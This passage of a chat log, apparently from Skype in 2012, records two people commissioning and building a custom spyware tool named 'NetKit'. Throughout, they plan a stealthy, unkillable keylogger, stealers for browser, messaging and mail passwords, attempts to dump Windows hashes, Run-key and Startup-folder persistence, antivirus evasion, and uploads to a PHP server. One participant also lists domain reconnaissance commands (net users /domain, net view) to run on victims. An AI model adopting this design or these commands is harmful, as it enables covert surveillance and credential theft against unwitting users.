  343. [11/29/2012 1:07:15 AM] ' Tweety HF;: Everything is 1000% personalized for my client in question.
  344. [11/29/2012 1:08:12 AM] Shelly Bongo: including form grabbing, webinject support etc?
  345. [11/29/2012 1:09:18 AM] ' Tweety HF;: Yes but for form grabbing etc I need to custom code C/C++/ASM modules to inject.
  346. [11/29/2012 1:09:56 AM] Shelly Bongo: that means what, that it'll take considerably more time?
  347. [11/29/2012 1:10:31 AM] ' Tweety HF;: I guess so. However, you can market off any RAT with basic features and I can update them as we progress.
  348. [11/29/2012 1:12:26 AM] Shelly Bongo: don't understand, what do you mean by "you can market off any RAT" ?
  349. [11/29/2012 1:13:14 AM] ' Tweety HF;: As in you have your RAT in basic functions. Tell them what will be added soon, and start selling to to customers. Have an auto update function and I can add a form grabber etc and it will update and have those moduels in.
  350. [11/29/2012 1:46:02 AM] ' Tweety HF;: Embedding resources for the API hooking and native calls for you keyogger.
  351. [11/29/2012 1:46:16 AM] ' Tweety HF;: Once that is done I will be starting on the body.
  352. [11/29/2012 1:57:47 AM] *** Shelly Bongo sent Jitsi.lnk ***
  353. [11/29/2012 1:58:04 AM] Shelly Bongo: wrong button
  354. [11/29/2012 1:58:34 AM] ' Tweety HF;: Uh ok
  355. [11/29/2012 2:33:37 AM] ' Tweety HF;: Adding basic functionality as well as start up and isntallation kits.
  356. [11/29/2012 3:07:28 AM] ' Tweety HF;: Do you want the intervals to be easy to configure?
  357. [11/29/2012 3:09:33 AM] Shelly Bongo: yes
  358. [11/29/2012 3:09:55 AM] ' Tweety HF;: I got most of it down, just doing every possible key I can think of at the moment
  359. [11/29/2012 3:10:08 AM] Shelly Bongo: everything should be modular and easy to conifugre, no inline assembly please :)
  360. [11/29/2012 3:10:22 AM] Shelly Bongo: sweet
  361. [11/29/2012 3:18:15 AM] ' Tweety HF;: I'm using a silent Framework installer, that okay?
  362. [11/29/2012 3:19:57 AM] Shelly Bongo: yes, that's what we discussed, 2.0 right?
  363. [11/29/2012 3:20:09 AM] ' Tweety HF;: Yes.
  364. [11/29/2012 3:20:14 AM] ' Tweety HF;: I will write it up in ASM.
  365. [11/29/2012 3:20:16 AM] ' Tweety HF;: That ok?
  366. [11/29/2012 3:20:23 AM] Shelly Bongo: how is it going to be bundled with the resulting exe?
  367. [11/29/2012 3:20:38 AM] Shelly Bongo: the installation is probably 20+mb
  368. [11/29/2012 3:21:38 AM] ' Tweety HF;: I will store the bytes of both the malware I am making for you and the .NET 2.0 installer, it will run the bytes of the installer first, once it is complete, it will run the malware.
  369. [11/29/2012 3:21:57 AM] Shelly Bongo: how large is the .net installer?
  370. [11/29/2012 3:22:16 AM] ' Tweety HF;: Not large at all I'm assuming
  371. [11/29/2012 3:23:04 AM] Shelly Bongo: http://download.cnet.com/Microsoft-NET-Framework-Redistributable-Package-x86/3000-10250_4-10726028.html
  372. [11/29/2012 3:23:09 AM] Shelly Bongo: that's 20mb... quite large
  373. [11/29/2012 3:23:18 AM] Shelly Bongo: and, there are different files for 32/64 bit
  374. [11/29/2012 3:23:27 AM] Shelly Bongo: diff installations
  375. [11/29/2012 3:23:34 AM] ' Tweety HF;: Not a problem.
  376. [11/29/2012 3:23:37 AM] Shelly Bongo: what do you suggest?
  377. [11/29/2012 3:23:59 AM] Shelly Bongo: you want to store 20mb of the installation on top of the malware?
  378. [11/29/2012 3:24:08 AM] ' Tweety HF;: Nope.
  379. [11/29/2012 3:24:30 AM] ' Tweety HF;: I will use sockets and extract the bytes from the web itself, so it will download the correct installer.
  380. [11/29/2012 3:24:41 AM] ' Tweety HF;: Before it does that it will check the architecture of the system first.
  381. [11/29/2012 3:24:47 AM] ' Tweety HF;: And pick the correct installer.
  382. [11/29/2012 3:25:15 AM] Shelly Bongo: okay
  383. [11/29/2012 3:25:43 AM] Shelly Bongo: do you check if it's installed before attempting to install it?
  384. [11/29/2012 3:26:49 AM] ' Tweety HF;: Yes of course.
  385. [11/29/2012 2:25:43 PM] ' Tweety HF;: Just woke up, finishing the hook. Currently detected, just removing some detections before I proceed any further.
  386. [11/29/2012 2:47:30 PM] ' Tweety HF;: Do you want it fully PHP'd or F2P?
  387. [11/29/2012 2:47:36 PM] ' Tweety HF;: FTP?
  388. [11/29/2012 3:30:02 PM] Shelly Bongo: hi
  389. [11/29/2012 3:30:18 PM] Shelly Bongo: can you implement both?
  390. [11/29/2012 3:30:39 PM] Shelly Bongo: PHP is a must, FTP will be nice too
  391. [11/29/2012 3:30:45 PM] Shelly Bongo: if you can put it in, great
  392. [11/29/2012 3:31:08 PM] ' Tweety HF;: Both is kind of pointless. F2P is directly into your hosting area.
  393. [11/29/2012 3:31:15 PM] ' Tweety HF;: I think I will stick to PHP as it's more secure.
  394. [11/29/2012 3:31:23 PM] Shelly Bongo: F2P ?
  395. [11/29/2012 3:31:46 PM] ' Tweety HF;: F2P you will need to put your domain log in details so it's not a good idea lol..
  396. [11/29/2012 3:31:47 PM] Shelly Bongo: lets stick to PHP only
  397. [11/29/2012 3:31:55 PM] ' Tweety HF;: I agree.
  398. [11/29/2012 3:38:05 PM] ' Tweety HF;: The hook is completed.
  399. [11/29/2012 3:38:17 PM] ' Tweety HF;: Added in window handling as well as num keys
  400. [11/29/2012 5:06:15 PM] ' Tweety HF;: Hook is fully complete. Taking a break, will build the body namespace.
  401. [11/29/2012 5:38:36 PM] ' Tweety HF;: Do you want any reporting?
  402. [11/29/2012 5:40:42 PM] Shelly Bongo: i'd like it to report once it is installed
  403. [11/29/2012 5:40:54 PM] Shelly Bongo: (e.g. within a random time between 1-5 minutes after installation)
  404. [11/29/2012 5:41:12 PM] Shelly Bongo: what other kinds of reportings do you have in mind?
  405. [11/29/2012 5:43:14 PM] ' Tweety HF;: I meant error handling in general.
  406. [11/29/2012 5:43:45 PM] Shelly Bongo: the users should never see anything, we covered that (stealth)
  407. [11/29/2012 5:43:57 PM] Shelly Bongo: can you make the process autorecover from attempts to kill it?
  408. [11/29/2012 5:44:11 PM] ' Tweety HF;: I know, but I'm saying if anything goes wrong do you want it to report to your PHP script and tell you everything?
  409. [11/29/2012 5:44:20 PM] ' Tweety HF;: And yes, the process will be unkillable + invisible.
  410. [11/29/2012 5:44:26 PM] ' Tweety HF;: It has auto start up.
  411. [11/29/2012 5:44:30 PM] Shelly Bongo: i do, sorry for the misunderstanding
  412. [11/29/2012 5:44:36 PM] ' Tweety HF;: No problem.
  413. [11/29/2012 5:44:41 PM] Shelly Bongo: for example, if an AV tries to kill the process - i'd like to know
  414. [11/29/2012 5:44:55 PM] ' Tweety HF;: Alright.
  415. [11/29/2012 5:45:03 PM] Shelly Bongo: btw, can you make it send a running processes/services list too?
  416. [11/29/2012 5:45:12 PM] Shelly Bongo: so i can tell which AV if any is running
  417. [11/29/2012 5:46:05 PM] ' Tweety HF;: If you want a list of all AV I can auto detect them, so instead of a list you can have only the AV's? I can do list too if you want.
  418. [11/29/2012 5:47:18 PM] Shelly Bongo: i prefer the list - can you make it include the process name, PID, image path, and process description?
  419. [11/29/2012 5:47:23 PM] Shelly Bongo: as seen in process manager
  420. [11/29/2012 5:47:26 PM] Shelly Bongo: s/process/taks/
  421. [11/29/2012 5:47:29 PM] Shelly Bongo: *task
  422. [11/29/2012 5:47:47 PM] ' Tweety HF;: Yes.
  423. [11/29/2012 5:47:59 PM] Shelly Bongo: great
  424. [11/29/2012 6:49:22 PM] ' Tweety HF;: Finished the browser stealers.
  425. [11/29/2012 6:49:29 PM] ' Tweety HF;: All working.
  426. [11/29/2012 7:30:39 PM] ' Tweety HF;: Doing the logs now
  427. [11/29/2012 8:27:44 PM] ' Tweety HF;: I added a Windows Key Stealer
  428. [11/29/2012 8:40:01 PM] Shelly Bongo: what does it mean - for the Windows account being run?
  429. [11/29/2012 8:40:10 PM] Shelly Bongo: it steals the NTLM hash?
  430. [11/29/2012 8:40:46 PM] ' Tweety HF;: What you mean?
  431. [11/29/2012 8:40:58 PM] ' Tweety HF;: It's the Key for the operating system.
  432. [11/29/2012 8:41:00 PM] ' Tweety HF;: Like the CD key
  433. [11/29/2012 8:47:22 PM] ' Tweety HF;: Do you want an injection?
  434. [11/29/2012 8:47:36 PM] Shelly Bongo: oh, got you
  435. [11/29/2012 8:47:55 PM] Shelly Bongo: i thought you can also create a stealer for the logged in account
  436. [11/29/2012 8:48:10 PM] ' Tweety HF;: I have. It steals all browser passwords.
  437. [11/29/2012 8:48:43 PM] Shelly Bongo: no, i mean a stealer for the logged in account - the hash of the password they used to authenticate when logging into Windows
  438. [11/29/2012 8:49:22 PM] ' Tweety HF;: Oh, why would you want that..?
  439. [11/29/2012 8:50:04 PM] Shelly Bongo: same reason for why you'd want any other stealer
  440. [11/29/2012 8:50:09 PM] Shelly Bongo: to get the credentials of the target
  441. [11/29/2012 8:50:32 PM] ' Tweety HF;: But the windows password is kind of pointless
  442. [11/29/2012 8:53:26 PM] Shelly Bongo: how is it pointless? users typically reuse passwords
  443. [11/29/2012 8:54:27 PM] Shelly Bongo: anyway, if you can't add it in then fine, if you can that'll be swell - it's not critical at this point
  444. [11/29/2012 8:54:50 PM] ' Tweety HF;: I will add it, just need to find a decryption method.
  445. [11/29/2012 8:54:56 PM] ' Tweety HF;: Also, do you want injection support.
  446. [11/29/2012 8:55:41 PM] Shelly Bongo: a decryption method for what?
  447. [11/29/2012 8:55:52 PM] Shelly Bongo: what does "injection support" mean, injection of what?
  448. [11/29/2012 8:56:07 PM] ' Tweety HF;: To decrypt the SAM files where the passwords are located.
  449. [11/29/2012 8:56:23 PM] ' Tweety HF;: Injection support, taking your malware and injecting the bytes into a real process.
  450. [11/29/2012 8:56:30 PM] ' Tweety HF;: So a process like svchost.exe or something
  451. [11/29/2012 8:56:37 PM] ' Tweety HF;: That way you dont need to make process protection.
  452. [11/29/2012 8:56:52 PM] ' Tweety HF;: It's how a Crypter runs.
  453. [11/29/2012 8:57:42 PM] Shelly Bongo: what would be the cons of injecting into a process rather than use our own process and protect it?
  454. [11/29/2012 8:58:12 PM] ' Tweety HF;: If you inject into svchost.exe it cannot be killed because the process is required by the system
  455. [11/29/2012 8:58:21 PM] ' Tweety HF;: if you do it using process protection, same thing
  456. [11/29/2012 8:58:30 PM] ' Tweety HF;: but injection support is more difficult and hard to fud
  457. [11/29/2012 9:02:22 PM] Shelly Bongo: so adding injection could make it less stealthy (easier to detect by AV) ?
  458. [11/29/2012 9:03:12 PM] ' Tweety HF;: Yes but the performance is better, it runs directly in a process and is more stable.
  459. [11/29/2012 9:03:16 PM] ' Tweety HF;: Which would you pick.
  460. [11/29/2012 9:03:22 PM] Shelly Bongo: i pick stealth
  461. [11/29/2012 9:03:30 PM] ' Tweety HF;: Ok.
  462. [11/29/2012 9:03:37 PM] Shelly Bongo: not increase chances with AV detecting this
  463. [11/29/2012 9:03:45 PM] ' Tweety HF;: Ok lol.
  464. [11/29/2012 9:04:04 PM] ' Tweety HF;: Currently writing a decryption method for windows passwords.
  465. [11/29/2012 9:04:11 PM] Shelly Bongo: okay
  466. [11/29/2012 9:21:44 PM] ' Tweety HF;: It's not possible to get the hashes because it will throw UAC
  467. [11/29/2012 9:27:09 PM] Shelly Bongo: even if the user is an admin?
  468. [11/29/2012 9:27:30 PM] ' Tweety HF;: Yes because it still prompts for UAC
  469. [11/29/2012 9:27:48 PM] Shelly Bongo: hmm okay, no way around uac? (e.g. make it invisible and click "yes" for the user somehow)
  470. [11/29/2012 9:30:03 PM] ' Tweety HF;: Not possible.
  471. [11/29/2012 9:30:45 PM] Shelly Bongo: http://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
  472. [11/29/2012 9:31:44 PM] ' Tweety HF;: You need to drop that file in the config file
  473. [11/29/2012 9:31:45 PM] Shelly Bongo: okay if not then forget it for now
  474. [11/29/2012 9:31:50 PM] ' Tweety HF;: Dropping in config = UAC
  475. [11/29/2012 9:33:28 PM] Shelly Bongo: we'll go without this then
  476. [11/29/2012 9:35:42 PM] ' Tweety HF;: Doing server installation, start up (3x) and UAC bypassing atm
  477. [11/29/2012 9:40:41 PM] Shelly Bongo: which startup methods are you selecting?
  478. [11/29/2012 9:42:41 PM] ' Tweety HF;: HKLMU HKLCU + Dir
  479. [11/29/2012 9:44:47 PM] Shelly Bongo: what does 'dir' mean? which dir, startup folder in start memnu?
  480. [11/29/2012 9:44:53 PM] Shelly Bongo: *menu
  481. [11/29/2012 9:49:01 PM] ' Tweety HF;: yes
  482. [11/29/2012 9:51:08 PM] Shelly Bongo: okay
  483. [11/29/2012 10:22:14 PM] Shelly Bongo: i'm out for the day, if needed i shall be here tomorrow as well
  484. [11/29/2012 10:22:36 PM] ' Tweety HF;: Alright.
  485. [11/29/2012 10:22:40 PM] ' Tweety HF;: I should be done by tomorrow.
  486. [11/30/2012 8:10:50 PM] ' Tweety HF;: For the hook, when I press Back space should it delete the key or should it just write ][backspace]?
  487. [11/30/2012 8:15:34 PM] ' Tweety HF;: ?
  488. [11/30/2012 10:28:30 PM] ' Tweety HF;: ??
  489. [11/30/2012 10:39:37 PM] Shelly Bongo: hi
  490. [11/30/2012 10:40:01 PM] Shelly Bongo: write [backspace]
  491. [11/30/2012 10:41:08 PM] ' Tweety HF;: ok so you dont want it to delete the character?
  492. [11/30/2012 10:41:56 PM] Shelly Bongo: correct
  493. [11/30/2012 10:42:15 PM] ' Tweety HF;: Alright.
  494. [11/30/2012 10:42:48 PM] Shelly Bongo: can you make it configurable in the source?
  495. [11/30/2012 10:43:12 PM] Shelly Bongo: (a future version could output an additional "formatted" line if special chars like backspace/delete are used, which will display the effective text entered, and delete characters that the user deleted using backspace/etc.)
  496. [11/30/2012 10:43:31 PM] ' Tweety HF;: that will slow down the hook a lot
  497. [11/30/2012 10:43:35 PM] ' Tweety HF;: you're going to lose keys
  498. [11/30/2012 10:43:45 PM] ' Tweety HF;: it needs to be one or the other
  499. [11/30/2012 10:44:03 PM] Shelly Bongo: which of my 2 lines are you responding to right now - the second i gather?
  500. [11/30/2012 10:45:01 PM] Shelly Bongo: making this configurable in the source, e.g. using defines, should have absolutely 0 impact on runtim
  501. [11/30/2012 10:45:06 PM] Shelly Bongo: s/runtim/runtime
  502. [11/30/2012 10:46:19 PM] Shelly Bongo: anyway, you can make it write [backspace] for now, we don't have to have this argument now, using [backspace] will allow for manual inspection of entered text
  503. [11/30/2012 10:46:52 PM] Shelly Bongo: how does the hook handle clipboard pastes of text by the way?
  504. [11/30/2012 10:47:30 PM] ' Tweety HF;: if it detects any data being changed in the clipboard it will log it.
  505. [11/30/2012 10:47:40 PM] Shelly Bongo: okay
  506. [11/30/2012 10:48:17 PM] Shelly Bongo: i have to leave in 3 minutes
  507. [11/30/2012 10:48:20 PM] ' Tweety HF;: Alright.
  508. [11/30/2012 10:48:24 PM] Shelly Bongo: do you have more questions?
  509. [11/30/2012 10:48:26 PM] ' Tweety HF;: Nope.
  510. [11/30/2012 10:48:31 PM] ' Tweety HF;: When will you be online next
  511. [11/30/2012 10:48:42 PM] Shelly Bongo: you know what, i'll be around in the next few hours
  512. [11/30/2012 10:48:45 PM] Shelly Bongo: forget it
  513. [11/30/2012 10:48:46 PM] Shelly Bongo: so i'm here
  514. [11/30/2012 10:48:51 PM] ' Tweety HF;: Alright.
  515. [11/30/2012 10:48:57 PM] ' Tweety HF;: I'll be done soon.
  516. [11/30/2012 10:49:02 PM] ' Tweety HF;: Then its just the PHP file
  517. [11/30/2012 10:52:36 PM] Shelly Bongo: the stealer part is complete?
  518. [11/30/2012 10:52:59 PM] Shelly Bongo: pass stealer that is
  519. [11/30/2012 10:53:14 PM] ' Tweety HF;: I got browsers done
  520. [11/30/2012 10:53:21 PM] ' Tweety HF;: I will do the others later on
  521. [11/30/2012 10:53:47 PM] Shelly Bongo: okay, and you didn't start the file stealer yet, correct?
  522. [11/30/2012 10:54:22 PM] ' Tweety HF;: Nope, i will need to do that last due to you wanting it to be custom configured
  523. [11/30/2012 11:05:03 PM] Shelly Bongo: okay, so it doesn't sound like you will finish today as there's still much to be done
  524. [11/30/2012 11:06:24 PM] Shelly Bongo: also the AV testing should take a few hours probably, with your AV virtual machines
  525. [11/30/2012 11:07:41 PM] Shelly Bongo: tomorrow, around same time as now, i will give you an elaborate description of the file stealer requirements, what should be configurable, etc. - okay?
  526. [11/30/2012 11:15:40 PM] ' Tweety HF;: Alright.
  527. [12/1/2012 3:59:07 AM] ' Tweety HF;: Fully completed keyboard hooking.
  528. [12/1/2012 3:59:16 AM] ' Tweety HF;: will work on stealers now.
  529. [12/1/2012 3:59:20 AM] ' Tweety HF;: Can you list them all down?
  530. [12/1/2012 10:33:57 AM] Shelly Bongo: IM - skype, icq, msn/live, yahoo, google talk
  531. Mail clients - outlook/thunderbird
  532. Browsers - IE, FF, chrome, safari
  533.  
  534. + sysinfo
  535.  
  536. also, reminder about screenshots every interval when logs are sent
  537. [12/1/2012 10:51:20 PM] ' Tweety HF;: I finished the system information
  538. [12/1/2012 10:51:22 PM] ' Tweety HF;: Is this okay?
  539. [12/1/2012 10:52:07 PM] ' Tweety HF;: http://pastebin.com/iihDn5gN
  540. [12/1/2012 11:37:44 PM] Shelly Bongo: hi, yes, that's great
  541. [12/1/2012 11:38:36 PM] Shelly Bongo: i came here to apologize that i won't be able to send the file stealer description at the scheduled time - it'll be done around 12 hours from now, okay?
  542. [12/2/2012 12:19:17 AM] ' Tweety HF;: sure
  543. [12/2/2012 12:26:44 AM] Shelly Bongo: Framework4,0,30319,0Windows CD Key: 32KD2-K9CTF-M3DJT-4J3WC-733WD
  544. [12/2/2012 12:26:52 AM] Shelly Bongo: forgot to \n before "Windows CD Key"
  545. [12/2/2012 12:28:12 AM] Shelly Bongo: about sysinfo - is there any way to know whether the user is logged into AD? (e.g. is a network user)
  546. [12/2/2012 12:30:35 AM] ' Tweety HF;: what does AD stand for
  547. [12/2/2012 12:31:14 AM] Shelly Bongo: active directory
  548. [12/2/2012 12:31:24 AM] Shelly Bongo: e.g. a part of corporate network
  549. [12/2/2012 12:48:16 AM] Shelly Bongo: i found a way to do it
  550. [12/2/2012 12:48:18 AM] Shelly Bongo: are you there?
  551. [12/2/2012 12:52:26 AM | Edited 12:52:51 AM] Shelly Bongo: Please add the below to the "system information" output
  552.  
  553. Environmental variable output:
  554. Computer name - %COMPUTERNAME%
  555. Logon server - %LOGONSERVER%
  556. Domain - %USERDOMAIN%
  557.  
  558. Command output:
  559. net users
  560. net users /domain
  561. net share
  562. net view
  563. net view /domain
  564. [12/2/2012 12:52:49 AM] ' Tweety HF;: Alright
  565. [12/2/2012 12:53:01 AM] ' Tweety HF;: Sorry went to have some dinner.
  566. [12/2/2012 12:53:07 AM] ' Tweety HF;: I'll get on it now.
  567. [12/2/2012 12:53:26 AM] Shelly Bongo: okay
  568. [12/2/2012 12:54:24 AM] Shelly Bongo: NetKit is the name you gave ? :)
  569. [12/2/2012 12:57:28 AM] ' Tweety HF;: Yes.
  570. [12/2/2012 1:03:12 AM] Shelly Bongo: quite a nice name actually
  571. [12/2/2012 1:04:36 AM] Shelly Bongo: can you please send the sysinfo dump after the udpate?
  572. [12/2/2012 1:04:40 AM | Edited 1:04:52 AM] Shelly Bongo: s/udpate/update
  573. [12/2/2012 1:05:09 AM] ' Tweety HF;: Sec
  574. [12/2/2012 1:12:56 AM] ' Tweety HF;: What you mean logon server and domain
  575. [12/2/2012 1:14:18 AM] Shelly Bongo: just output the value of those environmental variables
  576. [12/2/2012 1:14:41 AM] Shelly Bongo: Logon server - the server with which authentication took place during logon, and Domain - the domain to which the user is bound
  577. [12/2/2012 1:16:33 AM] ' Tweety HF;: How do I get those values
  578. [12/2/2012 1:18:33 AM] Shelly Bongo: in cmd.exe, type: echo %COMPUTERNAME%
  579. [12/2/2012 1:18:39 AM] Shelly Bongo: or the other 2
  580. [12/2/2012 1:18:57 AM] Shelly Bongo: (i'm sure there's a way to get it via .net)
  581. [12/2/2012 1:19:27 AM] ' Tweety HF;: Yeah alright
  582. [12/2/2012 1:19:29 AM] ' Tweety HF;: I got the computer name
  583. [12/2/2012 1:19:40 AM] ' Tweety HF;: But idk how to get domain and logon server
  584. [12/2/2012 1:19:53 AM | Edited 1:20:04 AM] Shelly Bongo: type: echo %USERDOMAIN%
  585. [12/2/2012 1:20:05 AM] ' Tweety HF;: alright
  586. [12/2/2012 1:20:26 AM] Shelly Bongo: they are environmental variable
  587. [12/2/2012 1:20:28 AM] Shelly Bongo: s
  588. [12/2/2012 1:20:33 AM] Shelly Bongo: so you can get them all the same way
  589. [12/2/2012 1:20:58 AM] ' Tweety HF;: It says file not found
  590. [12/2/2012 1:21:03 AM] ' Tweety HF;: so = no domain?
  591. [12/2/2012 1:21:28 AM] Shelly Bongo: C:\Users\1234>echo %USERDOMAIN%
  592. 1234-PC
  593. [12/2/2012 1:21:43 AM] Shelly Bongo: what output do you get?
  594. [12/2/2012 1:21:48 AM] ' Tweety HF;: A bit confused lol..
  595. [12/2/2012 1:22:35 AM] Shelly Bongo: ?
  596. [12/2/2012 1:22:37 AM] Shelly Bongo: open cmd.exe
  597. [12/2/2012 1:22:47 AM] Shelly Bongo: and type: echo %LOGONSERVER%
  598. [12/2/2012 1:23:05 AM] ' Tweety HF;: ohh
  599. [12/2/2012 1:23:05 AM] ' Tweety HF;: i see
  600. [12/2/2012 1:23:11 AM] ' Tweety HF;: but thats the same as pc name?
  601. [12/2/2012 1:23:36 AM] Shelly Bongo: for logonserver yes because i am doing a networkless logon (local authentication)
  602. [12/2/2012 1:23:44 AM] ' Tweety HF;: so that output is fine with you?
  603. [12/2/2012 1:23:50 AM] ' Tweety HF;: \\PCNAME\
  604. [12/2/2012 1:24:08 AM] Shelly Bongo: yes
  605. [12/2/2012 1:24:14 AM] ' Tweety HF;: uhh
  606. [12/2/2012 1:24:15 AM] ' Tweety HF;: ok lol
  607. [12/2/2012 1:25:35 AM] Shelly Bongo: hmm
  608. [12/2/2012 1:25:55 AM] Shelly Bongo: i just verified - the output of %userdomain% is wrong - it doesn't output the real domain, so you can skip it
  609. [12/2/2012 1:26:00 AM] Shelly Bongo: just do computername & logonserver
  610. [12/2/2012 1:26:04 AM] ' Tweety HF;: ok
  612. [12/2/2012 1:26:29 AM] Shelly Bongo: about the "net" command outputs, please add the command "net config workstation" to the end too, this will show the domain/workgroup
  613. [12/2/2012 1:26:54 AM] ' Tweety HF;: ok
  614. [12/2/2012 1:52:52 AM] Shelly Bongo: an unrelated question - do you have access to webinjects for spyeye/zeus-family?
  615. [12/2/2012 1:54:42 AM] ' Tweety HF;: lol
  616. [12/2/2012 1:54:43 AM] ' Tweety HF;: No but I am making one for fun
  617. [12/2/2012 2:01:03 AM] ' Tweety HF;: I made one better than zeus though before
  618. [12/2/2012 2:01:23 AM] ' Tweety HF;: it uses a single dll injection and writes the data into memory and dumps it straight into an irc channel
  619. [12/2/2012 2:01:50 AM] Shelly Bongo: making what for fun, a zeus alternative?
  620. [12/2/2012 2:03:04 AM] ' Tweety HF;: Not zeus, but the form grabber injection dll
  621. [12/2/2012 2:06:19 AM] Shelly Bongo: is form grabbing not just a keylogger for browser-space?
  622. [12/2/2012 2:06:32 AM] Shelly Bongo: or is this the component that also handles HTML injection?
  623. [12/2/2012 2:07:35 AM] ' Tweety HF;: It hooks onto the browsers process and injects itself into the memory, when memory entries are being processed the injection is being reversed and redirected into a memory mapping so it gets the forms that you need.
  624. [12/2/2012 2:08:00 AM] ' Tweety HF;: It's 10x faster than any keylogger.
  625. [12/2/2012 2:11:43 AM] Shelly Bongo: okay
  626. [12/2/2012 2:12:46 AM] Shelly Bongo: not to rush you or anything, but is the new sysinfo going to be ready soon?
  627. [12/2/2012 2:12:59 AM] ' Tweety HF;: yeah im just having a hard time reading streams atm
  628. [12/2/2012 2:13:15 AM] ' Tweety HF;: ---------------------------
  629. NetKit
  630. ---------------------------
  631. Microsoft Windows [Version 6.1.7601]
  632.  
  633. Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
  634.  
  635.  
  636.  
  637. C:\Users\Momz\Desktop\NetKit\NetKit\bin\Debug>
  638. ---------------------------
  639. OK  
  640. ---------------------------
  641. [12/2/2012 2:13:33 AM] ' Tweety HF;: keeps returning that instead of the actual server dir
  642. [12/2/2012 2:14:37 AM] Shelly Bongo: wish i could help.
  643. [12/2/2012 2:14:38 AM] Shelly Bongo: :)
  644. [12/2/2012 2:14:50 AM] ' Tweety HF;: it's no problem I'll fix it soon lol
  645. [12/2/2012 2:29:17 AM] Shelly Bongo: okay, i'm gone, back in 12 hours
  646. [12/2/2012 2:29:24 AM] ' Tweety HF;: alright
  647. [12/2/2012 2:29:25 AM] ' Tweety HF;: cya
  648. [12/2/2012 2:40:06 AM] ' Tweety HF;: doneee
  649. [12/2/2012 11:45:25 AM] Shelly Bongo: link?
  650. [12/2/2012 3:56:35 PM] ' Tweety HF;: Link for the log?
  651. [12/2/2012 3:58:38 PM] Shelly Bongo: hi
  652. [12/2/2012 3:58:45 PM] Shelly Bongo: yes, i wanted to see it if possible
  653. [12/2/2012 3:59:38 PM] Shelly Bongo: also - what's the current name of the files uploaded for screenshots/keylogs/passwords?
  654. [12/2/2012 4:00:11 PM] Shelly Bongo: [COMPUTERNAME]-[IP]-files-[TIMESTAMP]?
  655. [12/2/2012 4:00:28 PM] ' Tweety HF;: Not done that yet, I just have the sys log and stealer log done
  656. [12/2/2012 4:00:34 PM] Shelly Bongo: okay
  657. [12/2/2012 4:01:45 PM] Shelly Bongo: i have a thorough description of the docstealer feature ready, tell me when to send it
  658. [12/2/2012 4:04:28 PM] *** ' Tweety HF; sent test.txt ***
  659. [12/2/2012 4:05:51 PM] Shelly Bongo: nice
  660. [12/2/2012 4:05:56 PM] ' Tweety HF;: is it ok?
  661. [12/2/2012 4:06:12 PM] Shelly Bongo: Frameworks: .NET Framework4,0,30319,0, .NET Framework2,0,50727,0, .NET Framework4,0,30319,0Windows CD Key: 32KD2-K9CTF-M3DJT-4J3WC-733WD <-- forgot to put a "\n" between "Framework4,0,30319,0" and "Windows CD Key:"
  662. [12/2/2012 4:06:45 PM] Shelly Bongo: i see it is a merge of both the stealer log and the sysinfo
  663. [12/2/2012 4:07:00 PM] ' Tweety HF;: oh whoops
  664. [12/2/2012 4:07:01 PM] ' Tweety HF;: fixed it
  665. [12/2/2012 4:07:16 PM] ' Tweety HF;: sorry lol
  666. [12/2/2012 4:07:19 PM] ' Tweety HF;: anything else?
  667. [12/2/2012 4:07:40 PM] Shelly Bongo: it's missing the command outputs we discussed yesterday
  668. [12/2/2012 4:07:41 PM] Shelly Bongo: [Sunday, December 02, 2012 12:52 AM] Shelly Bongo:
  669.  
  670. <<< Command output:
  671. net users
  672. net users /domain
  673. net share
  674. net view
  675. net view /domain
  676. [12/2/2012 4:07:59 PM] ' Tweety HF;: oh did you want them all?
  677. [12/2/2012 4:08:02 PM] Shelly Bongo: yes
  678. [12/2/2012 4:08:56 PM] ' Tweety HF;: ok i will add that
  679. [12/2/2012 4:09:00 PM] ' Tweety HF;: and net view does not work
  680. [12/2/2012 4:09:06 PM] ' Tweety HF;: it freezes for me
  681. [12/2/2012 4:09:10 PM] Shelly Bongo: you can use same output pattern, e.g.:
  682.  
  683.  ======= net users (cmd) ========
  684. [output here]
  685. ======= net users /domain (cmd) =====
  686. [output here]
  687. [12/2/2012 4:09:26 PM] ' Tweety HF;: ok :)
  688. [12/2/2012 4:10:33 PM] Shelly Bongo: it doesn't freeze, just takes a while - probably empty results
  689. [12/2/2012 4:10:34 PM] ' Tweety HF;: look
  690. [12/2/2012 4:10:58 PM] ' Tweety HF;: http://imgur.com/kzrzO
  691. [12/2/2012 4:11:35 PM] Shelly Bongo: okay, so output that error
  692. [12/2/2012 4:11:46 PM] Shelly Bongo: just do a simple output of whatever is the response of that command
  693. [12/2/2012 4:11:51 PM] ' Tweety HF;: ok
  694. [12/2/2012 4:11:55 PM] Shelly Bongo: some computers will output an error - some will output results
  695. [12/2/2012 4:11:56 PM] ' Tweety HF;: even if it is an error?
  696. [12/2/2012 4:11:57 PM] Shelly Bongo: yes
  697. [12/2/2012 4:12:04 PM] Shelly Bongo: plain & simple output
  698. [12/2/2012 4:12:07 PM] ' Tweety HF;: ok no problem
  699. [12/2/2012 4:12:54 PM] Shelly Bongo: i don't think you will finish by the end of the week at this rate
  700. [12/2/2012 4:13:18 PM] Shelly Bongo: how much time do you plan on working on this by the upcoming sunday?
  701. [12/2/2012 4:13:26 PM] Shelly Bongo: i will really like it to finish by then
  702. [12/2/2012 4:13:30 PM] ' Tweety HF;: It's sunday here.
  703. [12/2/2012 4:13:40 PM] Shelly Bongo: i mean 7 days from now
  704. [12/2/2012 4:13:44 PM] ' Tweety HF;: By next week?
  705. [12/2/2012 4:13:52 PM] ' Tweety HF;: I can definitely finish it by next week.
  706. [12/2/2012 4:14:03 PM] Shelly Bongo: okay
  707. [12/2/2012 4:14:39 PM] Shelly Bongo: as i see after the sysinfo improvements (small) there's more stealers to be done (it seems like only chrome/FF are in now), and then the docstealer feature
  708. [12/2/2012 4:14:59 PM] ' Tweety HF;: Yes I can do them, I will work on them now.
  709. [12/2/2012 4:15:26 PM] *** Shelly Bongo sent filestealer.txt ***
  710. [12/2/2012 4:15:40 PM] Shelly Bongo: feature description
  711. [12/2/2012 4:17:15 PM] ' Tweety HF;: Just 1 problem.
  712. [12/2/2012 4:17:16 PM] ' Tweety HF;: Ok I can do that
  713. [12/2/2012 4:17:28 PM] Shelly Bongo: ?
  714. [12/2/2012 4:17:33 PM] Shelly Bongo: what's the issue
  715. [12/2/2012 4:19:08 PM] ' Tweety HF;: What are the directories you want to attack?
  716. [12/2/2012 4:19:18 PM] ' Tweety HF;: You don't want to send every file in the HDD do you?
